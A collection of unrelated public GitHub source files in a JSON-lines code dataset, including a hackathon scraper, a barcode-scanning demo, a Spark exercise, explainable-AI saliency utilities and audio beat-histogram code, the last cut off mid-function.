form})\n\n\n\n","repo_name":"kotvitaliy/django_forum_car","sub_path":"forum_car/forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27734811036","text":"# coding: utf-8\nimport argparse\nimport recognition.util.path as path\n\nfrom recognition.util.text import Text\n\n\nclass Resize:\n\n def __init__(self, filename, destination_path, **kwargs):\n self._filename = filename\n self._destination_path = destination_path\n self._size = kwargs.get('size', (576, 768))\n\n def generate(self):\n fonts = path.get_fonts()\n if len(fonts) == 0:\n raise ValueError('No font found')\n\n text = path.load_txt(self._filename)\n for font in fonts:\n pages = Text.resize(text, font=font, size=self._size)\n with open(self._destination_path, 'w') as f:\n for page in pages:\n f.write(page)\n\n\ndef process_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--filename',\n type=str,\n default=None,\n metavar='',\n help='Ruta del archivo')\n\n parser.add_argument('--destination-path',\n type=str,\n metavar='',\n default=None,\n help='Ruta donde se guarda el archivo de resultado')\n\n parser.add_argument('--width',\n type=int,\n default=576,\n metavar='',\n help=\"Ancho de las imágenes\")\n\n parser.add_argument('--height',\n type=int,\n default=768,\n metavar='',\n help=\"Alto de las imágenes\")\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n arguments = process_args()\n\n if not arguments.filename:\n raise ValueError('The filename is undefined')\n\n if not arguments.destination_path:\n raise ValueError('The destination path is undefined')\n\n resize = Resize(\n filename=arguments.filename,\n destination_path=arguments.destination_path,\n size=(arguments.width, arguments.height))\n\n resize.generate()\n","repo_name":"jonattanva/text-recognition","sub_path":"recognition/bin/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12691750086","text":"# https://towardsdatascience.com/data-science-skills-web-scraping-javascript-using-python-97a29738353f\n# The link above described scraping with selenium and firefox\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nimport click\nfrom datetime import datetime, timedelta\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nimport time\n\nimport logging as log\nlog.basicConfig(level=log.INFO)\n\n# Sample run\n# python github_follow_up.py --github-keyword chainlink\n@click.command(help='Gets github information about hackathon from hackathon platforms')\n@click.option('--github-keyword', required=True, help='What project youre looking for in github')\n@click.option('--input-file', default='next_week.json', help='What projects to check out')\n@click.option('--output-file', default='results.txt', help='What projects to check out')\n@click.option('--gitcoin/--no-gitcoin', default=True, help='What projects to check out')\ndef github_follow_up(github_keyword, input_file, output_file, gitcoin):\n # Opening JSON file\n hackathons = read_from_file(input_file)\n keyworded_hackathon_projects, total_submissions = get_hackathons_with_keyword(\n hackathons, github_keyword)\n # Gitcoin you don't have to start from a week ago, you can just scrape the most recently finished\n if gitcoin:\n gitcoin_keyworded_hackathon_projects, total_gitcoin_submissions = get_gitcoin_hackathons(\n github_keyword)\n click.echo(\"Total submissions: {} + {} = {}\".format(total_submissions,\n total_gitcoin_submissions, (total_submissions + total_gitcoin_submissions)))\n output_metrics(keyworded_hackathon_projects,\n gitcoin_keyworded_hackathons=gitcoin_keyworded_hackathon_projects)\n output_to_file(keyworded_hackathon_projects, output_file,\n gitcoin_keyworded_hackathons=gitcoin_keyworded_hackathon_projects)\n else:\n click.echo(\"Total submissions: {}\".format(total_submissions))\n output_metrics(keyworded_hackathon_projects)\n output_to_file(keyworded_hackathon_projects, output_file)\n\n\ndef get_hackathons_with_keyword(hackathons, github_keyword):\n hackathons_with_keyword = []\n total_submissions = 0\n for hackathon in hackathons:\n has_submissions = True\n submission_page_number = 0\n while(has_submissions):\n submission_page_number += 1\n result = requests.get(hackathon['url'].split(\n \"devpost.com\")[0] + \"devpost.com/submissions?page={}\".format(submission_page_number))\n src = result.content\n soup = BeautifulSoup(src, 'lxml')\n submissions = soup.find_all(\n 'a', attrs={'class': 'block-wrapper-link fade link-to-software'})\n if len(submissions) == 0:\n has_submissions = False\n break\n for submission in submissions:\n submission_page = requests.get(submission.attrs['href'])\n submission_src = submission_page.content\n submission_soup = BeautifulSoup(submission_src, 'lxml')\n possible_githubs = submission_soup.find_all('a')\n for possible_github in possible_githubs:\n if 'href' in possible_github.attrs and \"github\" in possible_github.attrs['href']:\n total_submissions += 1\n if github_repo_has_keyword(possible_github.attrs['href'], github_keyword):\n hackathons_with_keyword.append(hackathon)\n return hackathons_with_keyword, total_submissions\n\n\ndef github_repo_has_keyword(github_url, github_keyword):\n if is_organization(github_url):\n github_org_result = requests.get(github_url)\n github_org_src = github_org_result.content\n github_org_soup = BeautifulSoup(\n github_org_src, 'lxml')\n try:\n org_repos = github_org_soup.find(\n 'div', attrs={\"class\": \"org-repos repo-list\"})\n org_repo_headers = org_repos.find_all('h3')\n except:\n return False\n for org_repo_header in org_repo_headers:\n if(repo_has_keyword(\n \"https://github.com{}\".format(org_repo_header.find('a').attrs['href']), github_keyword)):\n return True\n else:\n search_url = github_url + \"/search?q={}&unscoped_q={}\".format(\n github_keyword, github_keyword)\n if(repo_has_keyword(search_url, github_keyword)):\n return True\n return False\n\n\ndef get_gitcoin_hackathons(github_keyword):\n hackathons_with_keyword = []\n total_submissions = 0\n result = requests.get(\"https://gitcoin.co/hackathon-list\")\n src = result.content\n soup = BeautifulSoup(src, 'lxml')\n finished_hackathons = soup.find(\n text=re.compile('Finished Hackathons')).parent.parent.find_all(\n 'div', attrs={\"class\": \"card-body col-9 col-sm-8\"})\n recent_finished_hackathons = get_finished_hackathons_from_last_week(\n finished_hackathons)\n for recent_finished_hackathon in recent_finished_hackathons:\n links = recent_finished_hackathon.find_all('a')\n for link in links:\n if \"projects\" in link.attrs['href']:\n # projects_result = requests.get(\n # \"https://gitcoin.co/{}\".format(link.attrs['href']), timeout=(3.05, 27))\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options)\n driver.get(\"https://gitcoin.co/{}\".format(link.attrs['href']))\n time.sleep(20)\n html = driver.page_source\n driver.quit()\n # projects_src = projects_result.content\n projects_soup = BeautifulSoup(html, 'lxml')\n github_links = projects_soup.find_all('a')\n for github_link in github_links:\n if 'href' in github_link.attrs and 'github.com' in github_link.attrs['href']:\n total_submissions += 1\n if github_repo_has_keyword(github_link.attrs['href'], github_keyword):\n hackathons_with_keyword.append(link.attrs['href'])\n return hackathons_with_keyword, total_submissions\n\n\ndef get_finished_hackathons_from_last_week(finished_hackathons):\n recent_finished_hackathons = []\n for finished_hackathon in finished_hackathons:\n time_set = finished_hackathon.find_all(\"time\")\n time_end = datetime.strptime(time_set[1].text, \"%m/%d/%Y\")\n now = datetime.now()\n if now < time_end + timedelta(days=7):\n recent_finished_hackathons.append(finished_hackathon)\n return recent_finished_hackathons\n\n\ndef is_organization(possible_github_link):\n condensed_link = possible_github_link.replace(\"//\", \"/\").strip()\n if condensed_link.endswith(\"/\"):\n condensed_link = condensed_link[:-1]\n if len(condensed_link.split(\"/\")) <= 3:\n return True\n return False\n\n\ndef get_org_name(possible_github_link):\n condensed_link = possible_github_link.replace(\"//\", \"/\").strip()\n if condensed_link.endswith(\"/\"):\n condensed_link = condensed_link[:-1]\n return condensed_link.split(\"/\")[2]\n\n\ndef repo_has_keyword(repo_url, github_keyword):\n search_url = repo_url + \"/search?q={}&unscoped_q={}\".format(\n github_keyword, github_keyword)\n github_result = requests.get(search_url)\n github_src = github_result.content\n github_soup = BeautifulSoup(github_src, 'lxml')\n h3_tags = github_soup.find_all('h3')\n for h3_tag in h3_tags:\n if \"code result\" in h3_tag.text:\n return True\n return False\n\n\ndef read_from_file(input_file):\n file = open(input_file)\n hackathons = json.load(file)\n file.close()\n return hackathons\n\n\ndef output_to_file(keyworded_hackathons, output_file, gitcoin_keyworded_hackathons=None):\n file = open(output_file, \"a+\")\n file.write(str(datetime.now()))\n file.write(str([str(hackathon) for hackathon in keyworded_hackathons]))\n if gitcoin_keyworded_hackathons:\n file.write(str([str(hackathon)\n for hackathon in gitcoin_keyworded_hackathons]))\n file.close()\n\n\ndef output_metrics(keyworded_hackathons, gitcoin_keyworded_hackathons=None):\n click.echo(str(datetime.now()))\n total_prize_pool = 0\n for hackathon in keyworded_hackathons:\n total_prize_pool += hackathon['prizes']\n\n if len(keyworded_hackathons) > 0:\n click.echo(\" Number of devpost hackathon projects {}\".format(\n len(keyworded_hackathons)))\n log.info(keyworded_hackathons)\n log.info(\" Average prize pool of submissions: \" +\n str(total_prize_pool / len(keyworded_hackathons)))\n # gitcoin\n if gitcoin_keyworded_hackathons:\n if len(gitcoin_keyworded_hackathons) > 0:\n click.echo(\" Number of gitcoin hackathon projects {}\".format(\n len(gitcoin_keyworded_hackathons)))\n log.info(gitcoin_keyworded_hackathons)\n log.info(\" Average prize pool of submissions: \" +\n str(total_prize_pool / len(gitcoin_keyworded_hackathons)))\n return\n else:\n if len(keyworded_hackathons) <= 0:\n click.echo(\" No projects had that keyword :(\")\n else:\n if len(keyworded_hackathons) <= 0:\n click.echo(\" No projects had that keyword :(\")\n\n\ndef main():\n github_follow_up()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PatrickAlphaC/hackathon_scraper","sub_path":"github_follow_up.py","file_name":"github_follow_up.py","file_ext":"py","file_size_in_byte":9621,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"72872509033","text":"import os\n\nPN_DELIVERY_TOPIC = 'pushowl.entity.pn_delivery'\nPN_CLICK_TOPIC = 'pushowl.entity.pn_click'\n\n# Confluent cloud configurations\nSCHEMA_REGISTRY_URL = os.environ.get('SCHEMA_REGISTRY_URL')\nBROKER_URL = os.environ.get('BROKER_URL')\nCONFLUENT_KAFKA_API_KEY = os.environ.get('CONFLUENT_KAFKA_API_KEY')\nCONFLUENT_KAFKA_API_SECRET = os.environ.get('CONFLUENT_KAFKA_API_SECRET')\nSCHEMA_REGISTRY_BASIC_AUTH_USER_INFO = os.environ.get('SCHEMA_REGISTRY_BASIC_AUTH_USER_INFO')\n","repo_name":"kkrbalam/ccloud-experiments","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31691209238","text":"from collections import deque\n\ndef solution(bridge_length, weight, truck_weights):\n answer = 0\n sum_weight = 0\n bridge = deque([0 for i in range(bridge_length)])\n while truck_weights:\n pop_truck = bridge.popleft()\n sum_weight -= pop_truck\n if sum_weight + truck_weights[0] <= weight:\n truck = truck_weights.pop(0)\n bridge.append(truck)\n sum_weight += truck\n else:\n bridge.append(0)\n answer += 1\n answer += len(bridge)\n return answer","repo_name":"sumnii/Al-th","sub_path":"sumsong/stack_queue/[2]다리를지나는트럭.py","file_name":"[2]다리를지나는트럭.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9223199532","text":"import sys\nimport time\nimport cv2\nimport numpy as np\nfrom ctypes import *\nfrom PIL import Image, ImageDraw\nfrom os import path\n\nimport BarcodeScanner as MWB\nimport MWParser as MWP\nimport MWResult as MWR\n\neffortLevel = 4\nuseMultiCode = False\nuseTiles = False\nsuppressOutput = False\nwriteImage = False\ntilesX = 6\ntilesY = 6\noverlap = 6\nmaxThreads = 4\n\nargc = len(sys.argv)\n\n# if argc < 2:\n# print(\"usage: pythonDemo [-En] [-M] [-S] [-T] [-Xn] [-Yn] [-On] [-Rn] [-W] filename\\n\\n\" +\n# \" -En Effort level (1-5, default \"+str(effortLevel)+\")\\n\" +\n# \" -M Enable multi-code\\n\" +\n# \" -S Suppress barcode results\\n\" +\n# \" -T Generate tiled regions\\n\" +\n# \" -Xn Tiles X dimension (default \"+str(tilesX)+\")\\n\" +\n# \" -Yn Tiles Y dimension (default \"+str(tilesY)+\")\\n\" +\n# \" -On Tiles overlap percentage (default \"+str(overlap)+\")\\n\" +\n# \" -Rn Maximum threads tiles/regions (default \"+str(maxThreads)+\")\\n\" +\n# \" -W Write output image\\n\" +\n# \" filename Image file to scan for barcodes\\n\\n\")\n# exit()\n\nfor x in range(argc-2):\n arg = sys.argv[x+1]\n \n # Effort level (assume 3rd character is 1-5)\n if arg[0:2].upper() == \"-E\":\n effortLevel = int(arg[2:])\n\n # Enable multicode? \n elif arg[0:2].upper() == \"-M\":\n useMultiCode = True\n \n # Suppress output?\n elif arg[0:2].upper() == \"-S\":\n suppressOutput = True\n \n # Enable tiles (and subsequently, multicode)?\n elif arg[0:2].upper() == \"-T\":\n useTiles = True\n\n # Set tiles X\n elif arg[0:2].upper() == \"-X\":\n tilesX = int(arg[2:])\n\n # Set tiles Y\n elif arg[0:2].upper() == \"-Y\":\n tilesY = int(arg[2:])\n\n # Set overlap\n elif arg[0:2].upper() == \"-O\":\n overlap = int(arg[2:])\n\n # Set maximum threads\n elif arg[0:2].upper() == \"-R\":\n maxThreads = int(arg[2:])\n\n # Write image with located barcodes?\n elif arg[0:2].upper() == \"-W\":\n writeImage = True\n \n# Last argument must be the image file name\n# fileName = sys.argv[argc-1]\n\ndef main():\n # Open live view of the camera\n cap = cv2.VideoCapture(0)\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n \n # Setup the SDK\n status = MWB.MWBregisterSDK(b'')\n if status != MWB.MWB_RTREG_OK:\n print(\"MWBregisterSDK returned \" + str(status) + \"; scan results will be masked and some features may not be available\")\n MWB.MWBsetActiveCodes( # MWB.MWB_CODE_MASK_QR |\n MWB.MWB_CODE_MASK_DM |\n # MWB.MWB_CODE_MASK_RSS |\n # MWB.MWB_CODE_MASK_39 |\n # MWB.MWB_CODE_MASK_EANUPC |\n # MWB.MWB_CODE_MASK_128 |\n # MWB.MWB_CODE_MASK_PDF |\n # MWB.MWB_CODE_MASK_AZTEC |\n # MWB.MWB_CODE_MASK_25 |\n # MWB.MWB_CODE_MASK_93 |\n # MWB.MWB_CODE_MASK_CODABAR |\n # MWB.MWB_CODE_MASK_DOTCODE |\n # MWB.MWB_CODE_MASK_11 |\n # MWB.MWB_CODE_MASK_MSI |\n # MWB.MWB_CODE_MASK_MAXICODE |\n # MWB.MWB_CODE_MASK_POSTAL |\n # MWB.MWB_CODE_MASK_TELEPEN |\n 0x0)\n MWB.MWBsetDirection(MWB.MWB_SCANDIRECTION_HORIZONTAL | MWB.MWB_SCANDIRECTION_VERTICAL)\n MWB.MWBsetLevel(effortLevel)\n if useMultiCode:\n MWB.MWBsetFlags(0, MWB.MWBgetFlags(0) | MWB.MWB_CFG_GLOBAL_ENABLE_MULTI)\n MWB.MWBsetResultType(MWB.MWB_RESULT_TYPE_MW)\n parserMask = MWP.MWP_PARSER_MASK_NONE\n parserMask = MWP.MWP_PARSER_MASK_AAMVA\n sdkVersion = MWB.MWBgetLibVersionText()\n print(\"Starting decoder - SDK Version \" + str(sdkVersion))\n print(\" Effort level: \" + str(effortLevel))\n if useMultiCode:\n print(\" Multi-code enabled\")\n if useTiles:\n print(\" Using tiles (\" + str(tilesX) + \" x \" + str(tilesY) + \") overlap \" + str(overlap) + \"%, \" + str(maxThreads) + \" threads\");\n\n resultLen = int(0)\n regionData = []\n regionCount = int(0)\n\n # Go through the main loop\n while True:\n ret, frame = cap.read()\n # frame = cv2.imread('download.jpeg')\n # Pass the frame to the cognex sdk\n '''\n 1. Convert cv2 image to PIL image\n 2. Continue with SDK\n '''\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n grayScale = frame.convert('L')\n pixels = grayScale.tobytes()\n if useTiles:\n # Tiles/regions\n #\n # This feature is primarily intended for use with multicode when there exists relatively small codes within a large image, or when \n # the layout/locations of the barcodes is known. By dividing the image into smaller \"regions\", the decoder can process them much\n # more efficiently, including using multiple threads, if desired. After processing all the regions, the SDK merges the results, \n # eliminating duplicates (due to overlapping regions) and retursn the results as a single MWResults list.\n # \n # When using tiles, the SDK divides the image into equally sized regions based on the number of columns (tilesX) and rows (tilesY)\n # specified, with some overlap. Note that the overlap (expressed as a percentage of the image size) needs to be at least as large as\n # the largest barcode to be scanned--otherwise the possibility exists that a code could be split across adjacent tiles and then\n # not be detected.\n #\n # Regions are defined as two pairs of X,Y coordinates as the upper left and lower right corners, in percentages of the image size.\n #\n # An application can also construct its own region data, explicitly defining the coordinates of each region versus using the tiles\n # feature. This application only demonstrates using tiles.\n #\n \n # Create the region data\n regionCount, regionData = MWB.MWBcreateRegionsFromTiles(tilesX, tilesY, overlap)\n \n # Decode using the defined regions (multithreaded)\n resultLen, scanResults = MWB.MWBscanGrayscaleRegions(pixels, grayScale.width, grayScale.height, regionData, regionCount, maxThreads)\n \n else:\n # Decode using the entire image (and any defined scanning rectangle)\n resultLen, scanResults = MWB.MWBscanGrayscaleImage(pixels, grayScale.width, grayScale.height)\n\n # Make sure the results did not overrun our buffer (very bad)\n if resultLen > sizeof(scanResults):\n print(\"Critical error: scanResults buffer is too small\")\n exit()\n\n # The length returned is for the raw results buffer; we will create an MWResults object from this since\n # it's much easier to work with!\n #\n if resultLen > 0:\n # Display MWResults\n results = MWR.MWResults(scanResults)\n if results.count > 0:\n print(\"Total barcodes detected: \", results.count)\n\n if not(suppressOutput):\n for i in range(results.count):\n result = results.results[i]\n print(str(i+1) + \": (\" + result.typeName+ \") \" + str(result.text))\n if parserMask != MWP.MWP_PARSER_MASK_NONE:\n \n parsedData = create_string_buffer(10000)\n \n # Envoke the parser\n #\n # The SDK provides two parsers, each returning different results:\n # JSON - parsed results are returned as a JSON document\n # Text - parsed results are returned as key/value pairs (primarily for demonstration/readability purposes)\n #\n #pLen, parsedData = MWB.MWPgetJSON(parserMask, result.parserInput, len(result.parserInput))\n pLen, parsedData = MWB.MWPgetFormattedText(parserMask, result.parserInput, len(result.parserInput))\n if pLen > sizeof(parsedData):\n print(\"Critical error: parsedData buffer is too small\")\n exit()\n \n if pLen > 0:\n print(\" Parsed Result: \" + parsedData.raw[0:int(pLen)].decode(\"utf-8\"))\n\n \n # Reload the orignal image\n im = frame\n draw = ImageDraw.Draw(im)\n \n # Draw a red box around each barcode found\n for i in range(results.count):\n result = results.results[i]\n draw.line([(result.locationPoints.p1.x,result.locationPoints.p1.y),\n (result.locationPoints.p2.x,result.locationPoints.p2.y),\n (result.locationPoints.p3.x,result.locationPoints.p3.y),\n (result.locationPoints.p4.x,result.locationPoints.p4.y),\n (result.locationPoints.p1.x,result.locationPoints.p1.y)],fill=(255,0,0),width=4)\n \n img = np.array(im)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imshow('image', img)\n\n if cv2.waitKey(1) == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n exit()\n \n \n\n else:\n print(\"No barcodes found: decoder returned \" + str(resultLen))\n ret, frame = cap.read()\n cv2.imshow('image', frame)\n\n if cv2.waitKey(1) == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n exit()\n\n\n\n # Display the live view\n \n\n\nif __name__ == '__main__':\n main()","repo_name":"Duncan-Alex-Clark/projectAudit","sub_path":"demo/pythonDemo/liveDecode.py","file_name":"liveDecode.py","file_ext":"py","file_size_in_byte":10387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32125832631","text":"import os\nimport shutil\n\n# Source folder containing the PNG pictures\nsource_folder = './raw'\n\n# Destination folder for unique pictures\ndestination_folder = './similar'\n\n# Folder to check for duplicates\ncheck_folder = './different'\n\n# Get the list of files in the source folder\nsource_files = os.listdir(source_folder)\n\n# Create the destination folder if it doesn't exist\nif not os.path.exists(destination_folder):\n os.makedirs(destination_folder)\n\n# Iterate over each file in the source folder\nfor file_name in source_files:\n if file_name.endswith('.png'):\n # Check if the file exists in the check folder\n if file_name in os.listdir(check_folder):\n print(f\"Duplicate file found: {file_name}\")\n else:\n # Copy the file to the destination folder\n source_file_path = os.path.join(source_folder, file_name)\n destination_file_path = os.path.join(destination_folder, file_name)\n shutil.copy2(source_file_path, destination_file_path)\n print(f\"Unique file copied: {file_name}\")\n","repo_name":"chess-playing-robotic-arm/RobotArmSoftware","sub_path":"copyImages.py","file_name":"copyImages.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5237999586","text":"#\n# What is the average revenue of the orders?\n# =========================================\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import IntegerType\n\n# Create the Spark session\nspark = SparkSession.builder \\\n .master(\"local\") \\\n .config(\"spark.sql.autoBroadcastJoinThreshold\", -1) \\\n .config(\"spark.executor.memory\", \"500mb\") \\\n .appName(\"Exercise1\") \\\n .getOrCreate()\n\n# Read the source tables\nproducts_table = spark.read.parquet(\"./data/products_parquet\")\nsales_table = spark.read.parquet(\"./data/sales_parquet\")\nsellers_table = spark.read.parquet(\"./data/sellers_parquet\")\n\n# Do the join and print the results\nprint(sales_table.join(products_table, sales_table[\"product_id\"] == products_table[\"product_id\"], \"inner\") \\\n\t\t\t\t .agg(avg(products_table[\"price\"] * sales_table[\"num_pieces_sold\"])) \\\n\t\t\t\t .show())","repo_name":"nbuzzano/spark-exercises","sub_path":"exercise01-A.py","file_name":"exercise01-A.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28026724458","text":"import related\nfrom ..commons.paging import ResponsePage\nfrom ..commons import fields\n\n\n@related.immutable\nclass Paid:\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n@related.immutable\nclass Pending:\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n\n@related.immutable\nclass Rejected:\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n@related.immutable\nclass Payment:\n paymentId = related.StringField()\n paymentDate = related.DateField(formatter='%Y-%m-%d')\n bankCode = related.IntegerField()\n bankbranchCode = related.IntegerField()\n accountNumber = related.IntegerField()\n brandCode = related.IntegerField()\n companyNumber = related.StringField()\n documentNumber = related.StringField()\n companyName = related.StringField()\n tradeName = related.StringField()\n netAmount = related.IntegerField()\n status = related.StringField()\n statusCode = related.IntegerField()\n type = related.StringField()\n typeCode = related.StringField()\n\n\n@related.immutable\nclass PaymentDaily:\n date = related.DateField(formatter='%Y-%m-%d')\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n paid = related.ChildField(Paid, required=False)\n pending = related.ChildField(Pending, required=False)\n rejected = related.ChildField(Rejected, required=False)\n payments = related.SequenceField(Payment, required=False)\n\n\n@related.immutable\nclass PaymentsDaily:\n paymentsDaily = related.SequenceField(PaymentDaily)\n\n\n@related.immutable\nclass Response(ResponsePage):\n content = related.ChildField(PaymentsDaily)","repo_name":"marcioinfo/ApiClient","sub_path":"rede-client/src/userede/mappers/payments/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18669166894","text":"import os\nimport time\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import numpy2ri\nfrom rpy2.robjects.packages import importr\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport keras\nimport innvestigate\nimport xarray as xr\nimport pandas as pd\nimport datetime as dt\nimport glob\nfrom tqdm import tqdm\n\n# PATHS\nXAI_PATH = './data/'\n\n# Get the proper neuron index based on the predictand map\ndef getNeuronIdx(neuron):\n\n neuron = int(neuron)\n \n if neuron == 2000:\n return 23920\n elif neuron == 5950:\n return 2657\n else:\n print('Please provide a valid neuron index')\n return None\n\n# Normalize the saliency maps\ndef normalizeSM(saliencyMaps):\n\n for idx in range(saliencyMaps.shape[0]):\n\n minSM = np.min(saliencyMaps[idx, :, :, :])\n maxSM = np.max(saliencyMaps[idx, :, :, :])\n saliencyMaps[idx, :, :, :] = (saliencyMaps[idx, :, :, :] - minSM) / (maxSM - minSM)\n\n return saliencyMaps\n\n# Compute and save the saliency maps\ndef compositeTrainSet(modelObj, modelName, neuronIdx, xData):\n\n # Get neuron index for CNNDoury\n if 'UNET' in modelName:\n neuron = getNeuronIdx(neuronIdx)\n else:\n neuron = neuronIdx\n\n # Set batch size for computing the SMs\n # Can't increase batchSize above 1 due to an existing bug in iNNvestigate\n # https://github.com/albermax/innvestigate/issues/246\n batchSize = 1\n\n # Pre-allocate memory for the saliencyMaps array\n saliencyMaps = np.empty(xData.shape)\n\n # Create analyzer\n analyzer = innvestigate.create_analyzer(name = 'integrated_gradients',\n model = modelObj,\n neuron_selection_mode = 'index')\n\n # First batch\n saliencyMaps[:batchSize, :] = analyzer.analyze(xData[:batchSize, :, :, :], neuron)\n saliencyMaps[:batchSize, :] = np.absolute(saliencyMaps[:batchSize, :])\n saliencyMaps[:batchSize, :] = normalizeSM(saliencyMaps[:batchSize, :])\n\n # Iterate over batches\n for i in tqdm(range(batchSize, xData.shape[0], batchSize)):\n \n saliencyMaps[i:i+batchSize, :] = analyzer.analyze(xData[i:i+batchSize, :, :, :], neuron)\n saliencyMaps[i:i+batchSize, :] = np.absolute(saliencyMaps[i:i+batchSize, :])\n saliencyMaps[i:i+batchSize, :] = normalizeSM(saliencyMaps[i:i+batchSize, :])\n\n # Save saliencyMaps as npy\n np.save(file = XAI_PATH + 'SMtrainSet_' + modelName + '_neuron' + str(neuronIdx) + '.npy',\n arr = saliencyMaps)","repo_name":"jgonzalezab/XAI-Statistical-Downscaling","sub_path":"XAI/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43038331326","text":"import numpy\nimport pylab\nimport scipy.fftpack\n\nimport overlap\n\ndef autocorrelation(signal):\n \"\"\" this matches Marsyas exactly. \"\"\"\n N = signal.shape[1]\n ffts = scipy.fftpack.fft(signal, 2*N, axis=1) / (2*N)\n ffts_abs = abs(ffts)\n ffts_abs_scaled = ffts_abs**0.5\n scratch = (scipy.fftpack.ifft(ffts_abs_scaled, axis=1\n ).real)*(2*N)\n xcorr = scratch[:,:N]\n return xcorr\n\n\ndef find_peaks(signal, number=10, peak_neighbors=1):\n candidates = []\n for i in xrange(peak_neighbors, len(signal)-peak_neighbors):\n if signal[i-1] < signal[i] > signal[i+1]:\n ok = True\n for j in xrange(i-peak_neighbors, i):\n if signal[j] >= signal[i]:\n ok = False\n for j in xrange(i+1, i+peak_neighbors):\n if signal[j] >= signal[i]:\n ok = False\n if ok:\n candidates.append( (signal[i], i) )\n candidates.sort(reverse=True)\n\n peaks = []\n #pylab.figure()\n #pylab.plot(signal)\n for c in candidates[:number]:\n index = c[1]\n mag = c[0]\n peaks.append(index)\n #print c\n #pylab.plot(index, mag, 'o')\n #pylab.show()\n\n return numpy.array(peaks)\n\ndef autocorr_index_to_bpm(index, oss_sr):\n return 60.0*oss_sr / index\ndef bpm_to_autocorr_index(bpm, oss_sr):\n return 60.0*oss_sr / bpm\n\n\ndef beat_histogram(defs, oss_sr, oss_data, plot=False):\n ### overlap\n overlapped = overlap.sliding_window(\n numpy.append(\n numpy.zeros(defs.BH_WINDOWSIZE - defs.BH_HOPSIZE),\n oss_data),\n #oss_data,\n defs.BH_WINDOWSIZE, defs.BH_HOPSIZE)\n #beat_histogram_sr = oss_sr / defs.BH_HOPSIZE\n\n ### autocorrelation\n autocorr = autocorrelation(overlapped)\n if defs.OPTIONS_BH < 2:\n sum_autocorr = numpy.sum(autocorr, axis=0)\n\n # remember that autocorrelation indices are reversed\n low = int(bpm_to_autocorr_index(defs.BPM_MAX, oss_sr))\n high = int(bpm_to_autocorr_index(defs.BPM_MIN, oss_sr))\n\n bpms = autocorr_index_to_bpm( numpy.arange(low, high), oss_sr )\n boxed_autocorr = sum_autocorr[low:high]\n use_autocorr = boxed_autocorr\n\n if defs.OPTIONS_BH == 1:\n # highpass\n b, a = scipy.signal.butter(2, 0.01, btype='high')\n filt_autocorr = scipy.signal.filtfilt(b, a, boxed_autocorr)\n # lowpass\n #b, a = scipy.signal.butter(2, 0.1)\n #filt_autocorr = scipy.signal.filtfilt(b, a, boxed_autocorr)\n use_autocorr = filt_autocorr\n\n these_peaks = find_peaks(use_autocorr,\n number=8, peak_neighbors=1)\n these_peaks = numpy.array(these_peaks)\n these_peaks_bpm = autocorr_index_to_bpm(these_peaks+low, oss_sr)\n\n #best_index = numpy.argmax(boxed_autocorr)\n #best_bpm = bpms[best_index]\n \n if plot:\n pylab.plot(bpms, boxed_autocorr)\n if defs.OPTIONS_BH == 1:\n pylab.plot(bpms, filt_autocorr)\n for index, bpm in zip(these_peaks, these_peaks_bpm):\n pylab.plot(bpm, use_autocorr[index], 'o')\n pylab.show()\n #exit(1)\n return these_peaks_bpm\n #exit(1)\n\n ### beat histogram\n Hn = numpy.zeros( (autocorr.shape[0], 4*defs.BPM_MAX) )\n for i in xrange( autocorr.shape[0] ):\n if i > 0 and i != (defs.BH_WINDOWSIZE / defs.BH_HOPSIZE):\n Hn[i] = Hn[i-1]\n prev_Hni = 4*defs.BPM_MAX-1\n pprev_Hni = prev_Hni\n sumamp = 0.0\n count = 1\n\n for j in xrange(1, autocorr.shape[1]):\n factor = 8/2\n Hni = int((oss_sr * 60.0 * factor / (j+1)) + 0.5);\n #bpm = autocorr_bpms[i]\n if Hni < 4*defs.BPM_MAX and Hni > 40:\n amp = autocorr[i][j]\n if amp < 0:\n amp = 0\n if prev_Hni == Hni:\n sumamp += amp\n count += 1\n else:\n sumamp += amp\n 